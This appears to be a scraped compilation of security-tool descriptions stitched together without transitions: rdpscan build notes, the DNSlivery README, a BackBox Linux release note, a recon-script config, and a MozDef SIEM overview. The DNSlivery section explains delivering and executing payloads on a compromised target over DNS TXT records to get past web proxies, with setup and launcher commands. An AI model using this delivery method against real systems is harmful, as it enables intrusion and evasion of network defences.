I chose 32-bit for Windows because there's a lot of old Windows out there, and I want to make the program as compaitble as possible with old versions. I want a completely static build, including the C runtime. To do that, I opened the resulting makefile in an editor, and changed the C compilation flag from /MD (meaning use DLLs) to /MT. While I was there, I added the following to the CPPFLAGS -D_WIN32_WINNT=0x501, which restrict OpenSSL to features that work back on Windows XP and Server 2003. Otherwise, you get errors that bcrypt.dll was not found if your run on those older systems. Now you'll need to make sure everything is in your path. I copied nasm.exe to the a directory in the PATH. For Visual Studio 2010, I ran the program vcvars32.bat to setup the path variables for the compiler. At this point on the command-line, I typed:
nmake
This makes the libraries. The static ones are libssl_static.lib and libcrypto_static.lib, which I use to link to in rdpscan.
macOS First of all, you need to install a compiler. I use the Developer Tools from Apple, installing XCode and the compiler. I think you can use Homebrew to install gcc instead. Then go int othe source directory for OpenSSL and create a makefile:
perl Configure darwin64-x86_64-cc
Now simply make it:
make depend make
At this point, it's created both dynamic (.dylib) and static (.lib) libraries. I deleted the dynamic libraries so that it'll catch the static ones by default. Now in rdpscan, just build the macOS makefile:
make -f Makefile.macos
This will compile all the rdpscan source files, then link to the OpenSSL libraries in the directory ../openssl that you just built. This should produce a 3-megabyte exexeutable. If you instead only got a 200-kilobyte executable, then you made a mistake and linked to the dynamic libraries instead.
Acknowledgments This project has been originally inspired by PowerDNS and Joff Thyer's technical segment on the Paul's Security Weekly podcast #590 (youtu.be/CP6cIwFJswQ).
Description
TL;DR DNSlivery allows delivering files to a target using DNS as the transport protocol. Features:
allows to print, execute or save files to the target
does not require any client on the target
does not require a full-fledged DNS server
What problem are you trying to solve? Easily deliver files and/or payloads to a compromised target where classic web delivery is not possible and without the need for a dedicated client software. This applies to restricted environments where outgoing web traffic is forbidden or simply inspected by a curious web proxy.
Even though more complete DNS tunneling tools already exist (s.a. dnscat2 and iodine), they all require to run a dedicated client on the target. The problem is that there is probably no other way then DNS to deliver the client in such restricted environments. In other words, building a DNS communication channel with these tools require to already have a DNS communication channel. In comparison, DNSlivery only provides one-way communication from your server to the target but does not require any dedicated client to do so. Thus, if you need to build a reliable two-way communication channel over DNS, use DNSlivery to deliver the client of a more advanced DNS tunneling tool to your target.
How does it work? Just like most DNS tunneling tools, DNSlivery uses TXT records to store the content of files in their base64 representation. However, it does not require to setup a full-fledged DNS server to work. Instead, it uses the scapy library to listen for incoming DNS packets and craft the desired response.
As most files do not fit in a single TXT record, DNSlivery will create multiple ordered records containing base64 chunks of the file. As an example, the above diagram illustrates the delivery of the 42nd chunk of the file named file. In order to retrieve all base64 chunks and put them back together without the need for a dedicated client on the target, DNSlivery will generate for every file:
This two-stages delivery process is required to add features to the stager (s.a. handling lost DNS responses) that would otherwise not fit in a single TXT record.
Note on target compatibility Currently, only PowerShell targets are supported. However, DNSlivery could be improved to support additional targets such as bash or python. Please let me know @no0be if this is a feature that you would like to see being implemented.
Requirements DNSlivery does not require to build a complex server infrastructure. In fact, there are only two simple requirements:
be able to create a NS record in your public DNS zone
have a Linux server capable of receiving udp/53 traffic from the Internet
Setup
DNS Zone The first step is to delegate a sub-domain to the server that will run DNSlivery by creating a new NS record in your domain. As an example, I created the following record to delegate the sub-domain dnsd.no0.be to the server at vps.no0.be.
dnsd IN NS vps.no0.be.
If your zone is managed by a third-party provider, refer to their documentation to create the NS record.
DNSlivery The only requirements to run DNSlivery are python3 and its scapy library.
git clone https://github.com/no0be/DNSlivery.git && cd DNSlivery pip install -r requirements.txt
Usage
Server DNSlivery will serve all files of a given directory (pwd by default) and needs to be run with root privileges to listen for incoming udp/53 packets.
DNSlivery - Easy files and payloads delivery over DNS
positional arguments: interface interface to listen to DNS traffic domain FQDN name of the DNS zone nameserver FQDN name of the server running DNSlivery
optional arguments: -h, --help show this help message and exit -p PATH, --path PATH path of directory to serve over DNS (default: pwd) -s SIZE, --size SIZE size in bytes of base64 chunks (default: 255) -v, --verbose increase verbosity
DNSlivery - Easy files and payloads delivery over DNS
[*] File "file" ready for delivery at file.dnsd.no0.be (7 chunks) [*] Listening for DNS queries...
Note on filename normalization As the charset allowed for domain names is much more restrictive than for UNIX filenames (per RFC1035), DNSlivery will perform normalization when required. Example:
[*] File "My Awesome Powershell Script ;).ps1" ready for delivery at my-awesome-powershell-script----ps1.dnsd.no0.be (1891 chunks)
Be aware that the current normalization code is not perfect as it does not take overlapping filenames or size limit into account.
Target On the target, start by retrieving the launcher of the desired file by requesting its dedicated TXT record. The following three launchers are supported:
Action
Launcher
Description
Print
[filename].print.[domain]
(Default) Print the delivered file to the console
Execute
[filename].exec.[domain]
Execute the delivered file (useful for scripts)
Save
[filename].save.[domain]
Save the delivered file to disk (useful for binaries)
nslookup -type=txt [filename].[stager].[domain]
Then, simply copy and paste the launcher quoted in the DNS response to a PowerShell console to retrieve the file on the target.
BackBox Linux is a penetration testing and security assessment oriented Linux distribution providing a network and systems analysis toolkit. It includes some of the most commonly known/used security and analysis tools, aiming for a wide spread of goals, ranging from web application analysis to network analysis, stress tests, sniffing, vulnerability assessment, computer forensic analysis, automotive and exploitation. It has been built on Ubuntu core system yet fully customized, designed to be one of the best Penetration testing and security distribution and more.
As usual, this major release includes many updates. These include new kernel, updated tools and some structural changes with a focus on maintaining stability and compatibility with Ubuntu 18.04 LTS.
What’s new
Updated Linux Kernel 4.18
Updated desktop environment
Updated hacking tools
Updated ISO Hybrid with UEFI support
System requirements
32-bit or 64-bit processor
1024 MB of system memory (RAM)
10 GB of disk space for installation
Graphics card capable of 800×600 resolution
DVD-ROM drive or USB port (3 GB)
The ISO images for both 32bit & 64bit can be downloaded from the official web site download section:
CURL_TIMEOUT=15 #timeout in --connect-timeout CURL_UA=Mozilla #user-agent (keep it simple) INTERNAL=NO #YES OR NO (show internal network info) URLVOID_KEY=your_API_key #using API from http://www.urlvoid.com/ FUZZ_LIMIT=10 #how many lines it will read from fuzz file OPEN_TARGET_URLS=NO #open found URLs at the end of script OPEN_EXTERNAL_LINKS=NO #open external links (frames) at the end of script FIRST_TIME=YES #if first time check for dependecies
The inspiration for MozDef comes from the large arsenal of tools available to attackers. Suites like metasploit, armitage, lair, dradis and others are readily available to help attackers coordinate, share intelligence and finely tune their attacks in real time. Defenders are usually limited to wikis, ticketing systems and manual tracking databases attached to the end of a Security Information Event Management (SIEM) system. The Mozilla Enterprise Defense Platform (MozDef) seeks to automate the security incident handling process and facilitate the real-time activities of incident handlers. Goals High level
Provide a platform for use by defenders to rapidly discover and respond to security incidents.
Automate interfaces to other systems like firewalls, cloud protections and anything that has an API
Facilitate repeatable, predictable processes for incident handling
Go beyond traditional SIEM systems in automating incident handling, information sharing, workflow, metrics and response automation
Technical
Offer micro services that make up an Open Source Security Information and Event Management (SIEM)
Scalable, should be able to handle thousands of events per second, provide fast searching, alerting, correlation and handle interactions between teams of incident handlers.
MozDef aims to provide traditional SIEM functionality including:
Integrates with a variety of log shippers including logstash, beaver, nxlog, syslog-ng and any shipper that can send JSON to either rabbit-mq or an HTTP(s) endpoint.
Provides easy integration to Cloud-based data sources such as cloudtrail or guard duty
Provides easy python plugins to manipulate your data in transit
Provides extensive plug-in opportunities to customize your event enrichment stream, your alert workflow, etc
Provides realtime access to teams of incident responders to allow each other to see their work simultaneously
Architecture
MozDef is based on open source technologies including:
Nginx (http(s)-based log input)
RabbitMQ (message queue and amqp(s)-based log input)
uWSGI (supervisory control of python-based workers)
bottle.py (simple python interface for web request handling)
elasticsearch (scalable indexing and searching of JSON documents)
Meteor (responsive framework for Node.js enabling real-time data sharing)
MongoDB (scalable data store, tightly integrated to Meteor)
VERIS from verizon (open source taxonomy of security incident categorizations)
d3 (javascript library for data driven documents)
dc.js (javascript wrapper for d3 providing common charts, graphs)
three.js (javascript library for 3d visualizations)
Firefox (a snappy little web browser)
Frontend processing
Frontend processing for MozDef consists of receiving an event/log (in json) over HTTP(S), AMQP(S), or SQS doing data transformation including normalization, adding metadata, etc. and pushing the data to elasticsearch.
Internally MozDef uses RabbitMQ to queue events that are still to be processed. The diagram below shows the interactions between the python scripts (controlled by uWSGI), the RabbitMQ exchanges and elasticsearch indices.
